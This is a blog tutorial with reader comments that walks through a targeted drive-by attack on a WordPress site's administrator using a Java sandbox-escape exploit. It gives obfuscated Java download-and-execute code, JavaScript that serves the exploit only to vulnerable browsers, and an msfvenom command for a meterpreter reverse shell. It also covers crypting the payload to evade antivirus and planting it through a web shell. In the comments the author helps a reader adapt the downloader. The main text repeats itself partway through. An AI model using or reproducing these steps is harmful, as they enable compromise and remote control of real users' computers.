Attacking Windows 8 with Java Exploit and Metasploit
In the last post i was talking about how to obfuscate a Java exploit (CVE-2012-4681 link here), now i want to show you how an attacker can use this obfuscated exploit for a targeted attack.
This is intended to be the second part of Wordpress Cookie Grabber video because i will show what you can do once you have compromised a website, frank's blog in this case. The victim will be only the administrator.
The exploit code in the previous article just escape from java sandbox and launch windows calculator. What we want to do is launch something different, like a meterpreter reverse shell which will connect back to the attacker. Thus in the previous code we have to add a download & execute class/method.
I opted for a new class but you can certainly add a method in the same class. This new class called NewClass (i'm lacking of fantasy) will download a meterpreter executable from a remote host and save it with the name fsc73B8.tmp.exe into temp folder, after that will be executed.
This two classes will be packed in one jar named java.jar; now it will be detected by antivirus ?
Link here.
Ok, great it's not detected. In our scenario we have to infect only the administrator (Frank), if he has a vulnerable version of java. To check this we use PluginDetect a powerfull javascript script (used also by Blackhole till version 1.2.5) able to detect all plugins installed on browser.
The page that check this will look like this.
Now it's time to create a meterpreter tcp reverse shell that connect back to us.
As you can image this executable will be detected by most antivirus, even if we use encoders. The best solution would be to create your own crypter since all crypters that you would find online aren't FUD, because they are public. I don't have time to create my own (and i don't know how to do it), but one day i will. In this page there are few crypters claiming to be Fully Undetectable, i chose 0vcrypter because can bypass Microsoft detection.
Frank lives in the United States and following this chart provided by opswat.com Microsoft Security Essential is the most widespread antivirus. With the default adoption by Windows 8 in the next months this percentage will increase even more.
After crypted our meterpreter shell and renamed java.exe we have all files that we need:
If you remember in the previous video we have left a weevely shell on his site so now we can connect to it and modify admin-header.php located into wp-admin folder.
Now start a meterpreter listener and if we were lucky that frank has a vulnerable version of java, our shell will be dropped correctly.
Once we have a meterpreter session we can do a lot of things but for now just took a screenshot of the desktop.
Enjoy the video.
Reference:
This is intended to be the second part of Wordpress Cookie Grabber video because i will show what you can do once you have compromised a website, frank's blog in this case. The victim will be only the administrator.
The exploit code in the previous article just escape from java sandbox and launch windows calculator. What we want to do is launch something different, like a meterpreter reverse shell which will connect back to the attacker. Thus in the previous code we have to add a download & execute class/method.
I opted for a new class but you can certainly add a method in the same class. This new class called NewClass (i'm lacking of fantasy) will download a meterpreter executable from a remote host and save it with the name fsc73B8.tmp.exe into temp folder, after that will be executed.
class NewClass
{
// Directory
String t = "java", m = "io", p = "tmpdir", dot = ".";
// Remote url
String r1 = "http:", e = "//192", m1 = "168", o = "2.3/fo", t1 = "lder/java", e1 = "exe";
public NewClass()
{
String l = System.getProperty( t+dot+m+dot+p ); // get temp folde path
String r = r1+e+dot+m1+dot+o+t1+dot+e1;
d( r, l);
}
private void d(String rPath, String lPath)
{
// File name
lPath += "\\fsc73B8.tmp.";
try
{
URL url = new URL(rPath);
ReadableByteChannel rbc = Channels.newChannel(url.openStream());
FileOutputStream fos = new FileOutputStream(lPath+"exe");
fos.getChannel().transferFrom(rbc, 0, 1 << 24);
fos.close();
// execute
Runtime.getRuntime().exec(lPath+"exe");
} catch( Exception e ){}
}
}
This two classes will be packed in one jar named java.jar; now it will be detected by antivirus ?
Link here.
Ok, great it's not detected. In our scenario we have to infect only the administrator (Frank), if he has a vulnerable version of java. To check this we use PluginDetect a powerfull javascript script (used also by Blackhole till version 1.2.5) able to detect all plugins installed on browser.
The page that check this will look like this.
<script src="PluginDetect.js" type="text/javascript"></script>
<script type="text/javascript">
// detect java plugin
if( PluginDetect.isMinVersion("Java") >= 0 )
{
// check version
PluginDetect.getVersion(" ");
var version = PluginDetect.getVersion("Java");
// Affected versions
// 170, 1701, 1702, 1703, 1704, 1705, 1706
version = version.replace(/\s/g, "");
if( version.legth == 3 )
version = "1700";
// Convert to int so i can compare
var intVersion = parseInt(version);
// if vulnerable
if( intVersion >= 1700 && intVersion <= 1706 )
{
document.write("<applet code=\"Java.class\" archive=\"java.jar\"></applet>");
}
}
</script>
Now it's time to create a meterpreter tcp reverse shell that connect back to us.
sudo msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=192.168.2.10 LPORT=15000 > meterpreter.exe
As you can image this executable will be detected by most antivirus, even if we use encoders. The best solution would be to create your own crypter since all crypters that you would find online aren't FUD, because they are public. I don't have time to create my own (and i don't know how to do it), but one day i will. In this page there are few crypters claiming to be Fully Undetectable, i chose 0vcrypter because can bypass Microsoft detection.
Frank lives in the United States and following this chart provided by opswat.com Microsoft Security Essential is the most widespread antivirus. With the default adoption by Windows 8 in the next months this percentage will increase even more.
After crypted our meterpreter shell and renamed java.exe we have all files that we need:
- page.html (landing page)
- PluginDetect.js
- java.jar (exploit)
- java.exe (meterpreter shell)
If you remember in the previous video we have left a weevely shell on his site so now we can connect to it and modify admin-header.php located into wp-admin folder.
Now start a meterpreter listener and if we were lucky that frank has a vulnerable version of java, our shell will be dropped correctly.
Once we have a meterpreter session we can do a lot of things but for now just took a screenshot of the desktop.
Enjoy the video.
Reference:
so new class is the only java code i need to compile to use a normal silent java drive by?
ReplyDeletethe url is entered in place of 192?
String r1 = "http:", e = "//dom", m1 = "ain", o = ".com/fo", t1 = "lder/java", e1 = "exe";
like that?
yes, but you don't need to split the string. I divided the string only to evade av. You can use
DeleteString s = "http://domain.com/exe_to_download.exe"
i get a bunch of errors
ReplyDeleteC:\programs\Java\jdk1.7.0_06\bin>javac NewClass.java
NewClass.java:21: error: cannot find symbol
URL url = new URL(rPath);
^
symbol: class URL
location: class NewClass
NewClass.java:21: error: cannot find symbol
URL url = new URL(rPath);
^
symbol: class URL
location: class NewClass
NewClass.java:22: error: cannot find symbol
ReadableByteChannel rbc = Channels.newChannel(url.openStream());
^
symbol: class ReadableByteChannel
location: class NewClass
NewClass.java:22: error: cannot find symbol
ReadableByteChannel rbc = Channels.newChannel(url.openStream());
^
symbol: variable Channels
location: class NewClass
NewClass.java:23: error: cannot find symbol
FileOutputStream fos = new FileOutputStream(lPath+"exe");
^
symbol: class FileOutputStream
location: class NewClass
NewClass.java:23: error: cannot find symbol
FileOutputStream fos = new FileOutputStream(lPath+"exe");
^
symbol: class FileOutputStream
location: class NewClass
6 errors